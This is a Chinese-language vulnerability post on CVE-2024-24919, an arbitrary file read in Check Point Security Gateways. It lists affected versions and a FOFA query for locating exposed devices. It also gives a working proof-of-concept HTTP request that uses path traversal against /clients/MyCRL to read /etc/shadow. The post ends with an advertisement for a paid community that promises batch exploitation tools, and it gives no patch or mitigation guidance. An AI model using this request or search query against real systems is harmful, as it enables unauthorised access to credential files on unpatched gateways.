CVE-2024-24919 Check Point Security Gateways 任意文件读取漏洞

漏洞描述

Check Point Security Gateways 是一个全面的网络安全解决方案，可以帮助企业构建强大的防御体系，保护其网络和数据安全。 Check Point Security Gateways 存在任意文件读取漏洞，成功利用该漏洞，能读取服务器上任意文件。

影响版本

• Check Point-quantum_security_gatewayR81.20， R81.10， R81， R80.40受影响。
• Check Point-CloudGuard Network SecurityR81.20， R81.10， R81， R80.40受影响。
• Check Point-Quantum MaestroR81.20， R81.10， R80.40， R80.30SP， R80.20SP受影响。
• Check Point-Quantum Scalable ChassisR81.20， R81.10， R80.40， R80.30SP， R80.20SP受影响。
• Check Point-Quantum Spark GatewaysR81.10.x， R80.20.x， R77.20.x受影响。

FOFA

app="Check_Point-SSL-Network-Extender"

POC

POST /clients/MyCRL HTTP/1.1
Host: 
 
aCSHELL/../../../../../../../etc/shadow

漏洞复现

nuclei运行结果

nuclei-poc已上传到知识星球

知识星球
高质量安全知识星球社区，致力于漏洞挖掘，渗透技巧，安全资料，星球承诺会持续更新0/1/NDay及对应的批量利用工具，团队内部漏洞库，内外网攻防技巧，你所需要的各类安全工具和资料以及团队师傅们最新的学习研究成果。分享行业内最新动态，解答交流各类技术问题。
涉及方向包括Web渗透、免杀绕过、红蓝攻防、代码审计、应急响应、安全培训、CTF、小白入门、职业规划和疑难解答。CatalyzeSec，安全技术水平的催化者，星球针对成员的技术问题，快速提供思考方向及解决方案，并为星友提供多种方向的学习资料、安全工具、POC&EXP以及各种学习笔记等，以引导者和催化剂的方式助力安全技术水平的提升。
我们是一个快速成长的team，团队的发展方向与每一位星友的学习方向密切相关，加入我们，一起成为更好的自己！
PS：随着星球内知识的积累，人员的增加，星球价格也会随之增加，前一百位加入我们的师傅可享受99元朋友价！

团队内部独家知识库